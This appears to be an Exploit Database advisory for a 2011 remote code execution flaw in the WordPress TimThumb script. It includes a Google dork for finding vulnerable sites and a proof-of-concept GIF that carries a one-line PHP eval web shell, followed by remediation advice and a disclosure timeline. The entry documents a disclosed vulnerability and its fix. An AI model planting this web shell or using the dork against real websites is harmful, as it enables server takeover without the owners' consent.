WordPress TimThumb Plugin 1.32 - Remote Code Execution

Author: MaXe Published: 2011-08-03 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A


Prev Home Next
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php
# Date: 3rd August 2011
# Author: MaXe
# Software Link:
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
WordPress TimThumb (Theme) Plugin - Remote Code Execution
Versions Affected: 
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)

Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.

External Links:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, due to the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.

Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)

Stored file on the Target: (This can change from host to host.)
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.

Proof of Concept File:

(Transparent GIF + <?php @eval($_GET['cmd']) ?>

-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.

NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011